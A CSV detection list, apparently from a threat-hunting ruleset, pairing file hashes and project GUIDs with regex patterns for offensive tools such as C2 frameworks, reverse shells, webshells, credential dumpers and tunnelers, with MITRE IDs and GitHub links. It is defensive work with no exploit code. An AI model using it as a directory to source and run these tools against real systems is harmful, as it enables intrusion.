"*62eb5977f66221339e954ea9e4947966ad4558966264814a406b93dab8b275df*",".{0,1000}62eb5977f66221339e954ea9e4947966ad4558966264814a406b93dab8b275df.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","#filehash","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","27870"
"*62eed3bd13a07c779ba809b4ba237a1e1e8c882f9f62bb9fcf87199213cb8824*",".{0,1000}62eed3bd13a07c779ba809b4ba237a1e1e8c882f9f62bb9fcf87199213cb8824.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27872"
"*62f11b4ae2f0d26ed55efd4c918cfec1bd95036f507cf2dbf3295949831366ca*",".{0,1000}62f11b4ae2f0d26ed55efd4c918cfec1bd95036f507cf2dbf3295949831366ca.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","27873"
"*62f733a63d38061d5768057eccce85a23d4c22748cdb5b80b9a12ffc18cc976a*",".{0,1000}62f733a63d38061d5768057eccce85a23d4c22748cdb5b80b9a12ffc18cc976a.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","27874"
"*62f8b7689b4e41dd4035f0583ec04493d41f783e7d8152bb4dd4196e3bbc7cf5*",".{0,1000}62f8b7689b4e41dd4035f0583ec04493d41f783e7d8152bb4dd4196e3bbc7cf5.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","27875"
"*6302105A-80BB-4987-82EC-95973911238B*",".{0,1000}6302105A\-80BB\-4987\-82EC\-95973911238B.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","27878"
"*63033e3b8e698bba85b87ca2b199e9c3e7da9d046782343ac0eccab4beef8441*",".{0,1000}63033e3b8e698bba85b87ca2b199e9c3e7da9d046782343ac0eccab4beef8441.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27879"
"*6308bf4ba359c23171ea4efc92a5bc51bf3b52f79efc14ea99c5d6454eacc099*",".{0,1000}6308bf4ba359c23171ea4efc92a5bc51bf3b52f79efc14ea99c5d6454eacc099.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27881"
"*630BF262-768C-4085-89B1-9FEF7375F442*",".{0,1000}630BF262\-768C\-4085\-89B1\-9FEF7375F442.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","27882"
"*630cf7ac06f7286e926cfaf1b2ca5105a7caaee6627837da5f71d5b44302f992*",".{0,1000}630cf7ac06f7286e926cfaf1b2ca5105a7caaee6627837da5f71d5b44302f992.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","27883"
"*63109331510d0f6d9baf8b41017b9187c80f2ff24b426750a1f7f3fe8e82d00e*",".{0,1000}63109331510d0f6d9baf8b41017b9187c80f2ff24b426750a1f7f3fe8e82d00e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27885"
"*6315ca3522a2846e520579222af0ef4ae8db9d9f94046e9ea507bb7a22d81b6f*",".{0,1000}6315ca3522a2846e520579222af0ef4ae8db9d9f94046e9ea507bb7a22d81b6f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27886"
"*63184d644922cc6b2c7cf8c1059485d5de726bd2d5e6538bfcdbec841818ca87*",".{0,1000}63184d644922cc6b2c7cf8c1059485d5de726bd2d5e6538bfcdbec841818ca87.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","27887"
"*631cdab8f10610656a3f360d18fc7019549a68806579092a83cfdee543a38255*",".{0,1000}631cdab8f10610656a3f360d18fc7019549a68806579092a83cfdee543a38255.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27888"
"*632b9ef95949f0b11919a46cdb0bf586e8a291ff7c13ce44ba0b0ba83015050d*",".{0,1000}632b9ef95949f0b11919a46cdb0bf586e8a291ff7c13ce44ba0b0ba83015050d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27889"
"*633009bda2a3aea268272f19eadf91df366d38bf84e76d56b9e598886d909fbe*",".{0,1000}633009bda2a3aea268272f19eadf91df366d38bf84e76d56b9e598886d909fbe.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27891"
"*6332b66bf0be1e9c829515ae2ab3104e12d786263d283a512e756f561782c0f0*",".{0,1000}6332b66bf0be1e9c829515ae2ab3104e12d786263d283a512e756f561782c0f0.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27892"
"*6334665cbd227e91e2fe4517cc5bb0e6f4163aa4ae10430e034df836287dc339*",".{0,1000}6334665cbd227e91e2fe4517cc5bb0e6f4163aa4ae10430e034df836287dc339.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","#filehash","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","27893"
"*6339e33836fd201a43b6cf193789135c21b9cb8d3de526b6b91540991f42c51d*",".{0,1000}6339e33836fd201a43b6cf193789135c21b9cb8d3de526b6b91540991f42c51d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27894"
"*633bd0cfd64ccc0030ca38148459f71dba02cf3ce103ce24d8a0872c00a26eeb*",".{0,1000}633bd0cfd64ccc0030ca38148459f71dba02cf3ce103ce24d8a0872c00a26eeb.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","27896"
"*633d4692872611822975590e70d341e38eb6bb4f97c3a3e61f501193c1c5a101*",".{0,1000}633d4692872611822975590e70d341e38eb6bb4f97c3a3e61f501193c1c5a101.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27897"
"*63518ea48a4b0bd7a3750f6c67948316800e284ce9951e6901bacf8fdbb4dd07*",".{0,1000}63518ea48a4b0bd7a3750f6c67948316800e284ce9951e6901bacf8fdbb4dd07.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27898"
"*635640f232a519c71fbdd148bfef9ef8f9c61909106f2d458273fa07830b21ea*",".{0,1000}635640f232a519c71fbdd148bfef9ef8f9c61909106f2d458273fa07830b21ea.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27899"
"*6357479243a64e0edc18f138b2f1ccce22e4396db9ecf4740b71f6185ea055f1*",".{0,1000}6357479243a64e0edc18f138b2f1ccce22e4396db9ecf4740b71f6185ea055f1.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27900"
"*63583c53c98e8ce473102325800fa6c9fe7ea1bc5be5d472052a279ce0015ad0*",".{0,1000}63583c53c98e8ce473102325800fa6c9fe7ea1bc5be5d472052a279ce0015ad0.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27901"
"*635cde05365898125638645ecab1f6cdb3136c06f0882c2617d2046a2e8f5f27*",".{0,1000}635cde05365898125638645ecab1f6cdb3136c06f0882c2617d2046a2e8f5f27.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27903"
"*63688c4f211155c76f2948ba21ebaf83*",".{0,1000}63688c4f211155c76f2948ba21ebaf83.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","27906"
"*636b4e445770ac1cf66687e9a1ce57347221eeb539f14fe4b0b60f387cc41009*",".{0,1000}636b4e445770ac1cf66687e9a1ce57347221eeb539f14fe4b0b60f387cc41009.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27907"
"*6376A5B0-1BA8-4854-B81E-F5DC072C0FEE*",".{0,1000}6376A5B0\-1BA8\-4854\-B81E\-F5DC072C0FEE.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#GUIDproject","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","27908"
"*63790d59bba24d6d5b164d52d837f51bae95f4f6b6337df180c3d7cad3194c73*",".{0,1000}63790d59bba24d6d5b164d52d837f51bae95f4f6b6337df180c3d7cad3194c73.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","27909"
"*63794d03a5550be74cf88df14b42968a7e23a58eea0690d23fedf01f57067166*",".{0,1000}63794d03a5550be74cf88df14b42968a7e23a58eea0690d23fedf01f57067166.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27910"
"*63839def4c061f214718a67dc487187d5b73288d72845c4007b5162ad57dd47b*",".{0,1000}63839def4c061f214718a67dc487187d5b73288d72845c4007b5162ad57dd47b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27911"
"*638f7368dfceb394d7ad1c927ce5399386833816bd099ae41db5a249c3ff8362*",".{0,1000}638f7368dfceb394d7ad1c927ce5399386833816bd099ae41db5a249c3ff8362.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27913"
"*63957210-4871-42D3-B98A-191AF5F91079*",".{0,1000}63957210\-4871\-42D3\-B98A\-191AF5F91079.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#GUIDproject","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","27916"
"*639EF517-FCFC-408E-9500-71F0DC0458DB*",".{0,1000}639EF517\-FCFC\-408E\-9500\-71F0DC0458DB.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","#GUIDproject","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","27918"
"*63a6adaa32811c62d5749052c03057771fb33ae63a765a0ecc480829442dc91e*",".{0,1000}63a6adaa32811c62d5749052c03057771fb33ae63a765a0ecc480829442dc91e.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","0","#filehash","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","27920"
"*63a6bad64de560056ed496b6b7103056e4bdaf19f49011120997a5b87d141940*",".{0,1000}63a6bad64de560056ed496b6b7103056e4bdaf19f49011120997a5b87d141940.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","#filehash","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","27921"
"*63adf3a9c56126fa024fea0bb7f4c175bbfe48c4fe06b016985ffea27142c5d8*",".{0,1000}63adf3a9c56126fa024fea0bb7f4c175bbfe48c4fe06b016985ffea27142c5d8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27922"
"*63b104b8d35cf8e3ae08ed500e337ce1617533f8c0b38eef55a07cdca529324f*",".{0,1000}63b104b8d35cf8e3ae08ed500e337ce1617533f8c0b38eef55a07cdca529324f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27923"
"*63b2a6c8846a7e0c5116f9fd61281e092cf0db6374730d041029a1b4d3aac96b*",".{0,1000}63b2a6c8846a7e0c5116f9fd61281e092cf0db6374730d041029a1b4d3aac96b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27924"
"*63bf4fdc657ca1599e0f4b6657bf656a5c9f9f3eeb7af957e511707436109835*",".{0,1000}63bf4fdc657ca1599e0f4b6657bf656a5c9f9f3eeb7af957e511707436109835.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27925"
"*63c026b6e54d35d2c987267fd01894021efea0f83a87e98c142b96f10f301914*",".{0,1000}63c026b6e54d35d2c987267fd01894021efea0f83a87e98c142b96f10f301914.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","27926"
"*63c0ab8a69d5eaf913b7f348ff7ab6705e8185283d08f455b7f194319ebf7f12*",".{0,1000}63c0ab8a69d5eaf913b7f348ff7ab6705e8185283d08f455b7f194319ebf7f12.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27927"
"*63c0c9e03586b36bba16e6cd2f73a71d675f39e9a4c87b09aaa2253cb763c833*",".{0,1000}63c0c9e03586b36bba16e6cd2f73a71d675f39e9a4c87b09aaa2253cb763c833.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27928"
"*63caa714b73110ab5d2e14db8fcddc0ddea627f5bd92bcfacb9d2c6e507e6a84*",".{0,1000}63caa714b73110ab5d2e14db8fcddc0ddea627f5bd92bcfacb9d2c6e507e6a84.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27929"
"*63CAF2AD-A016-43BD-AA27-02CB848E2067*",".{0,1000}63CAF2AD\-A016\-43BD\-AA27\-02CB848E2067.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","27930"
"*63cfc7750ccf7f7ad82a20890b6957069e0471d976a0a3a960ebef69b6641234*",".{0,1000}63cfc7750ccf7f7ad82a20890b6957069e0471d976a0a3a960ebef69b6641234.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27932"
"*63d02e75b729e2cc17604235cf9c0b506b3ca5d578a8e32a0e85e28763ca25a6*",".{0,1000}63d02e75b729e2cc17604235cf9c0b506b3ca5d578a8e32a0e85e28763ca25a6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27933"
"*63d84b4b0a5acad4d2bf346c746f60f53e6e14c09ae6d5271cd755a6ebcdcf66*",".{0,1000}63d84b4b0a5acad4d2bf346c746f60f53e6e14c09ae6d5271cd755a6ebcdcf66.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27935"
"*63da55b370a27e54e02b3d7b56515734dd12a930faec455beaf2c6e9bcbfab32*",".{0,1000}63da55b370a27e54e02b3d7b56515734dd12a930faec455beaf2c6e9bcbfab32.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","27936"
"*63dcdf6e5eb8252ec73b58bde6249db9d38272dc6870074d2569f7431a1ab32f*",".{0,1000}63dcdf6e5eb8252ec73b58bde6249db9d38272dc6870074d2569f7431a1ab32f.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","27937"
